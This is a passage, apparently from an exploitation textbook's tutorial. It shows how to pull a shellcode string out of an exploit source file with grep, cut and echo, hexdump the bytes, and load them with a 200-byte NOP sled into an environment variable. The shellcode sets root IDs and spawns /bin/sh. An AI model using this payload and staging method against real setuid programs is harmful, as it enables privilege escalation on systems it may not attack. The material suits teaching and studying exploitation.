144 0x300
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
reader@hacking:~/booksrc $
The first 10 lines of the program are piped into grep, which only shows the
lines that begin with a quotation mark. This isolates the lines containing
the shellcode, which are then piped into cut using options to display only the
bytes between two quotation marks.
BASH’s for loop can actually be used to send each of these lines to an
echo command, with command-line options to recognize hex expansion and
to suppress adding a newline character to the end.
reader@hacking:~/booksrc $ for i in $(head exploit_notesearch.c | grep "^\"" | cut -d\" -f2)
do
echo -en $i
done > shellcode.bin
reader@hacking:~/booksrc $ hexdump -C shellcode.bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|
00000020 e1 cd 80 |...|
00000023
reader@hacking:~/booksrc $
Now we have the shellcode in a file called shellcode.bin. This can be used
with command substitution to put shellcode into an environment variable,
along with a generous NOP sled.
reader@hacking:~/booksrc $ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
reader@hacking:~/booksrc $ echo $SHELLCODE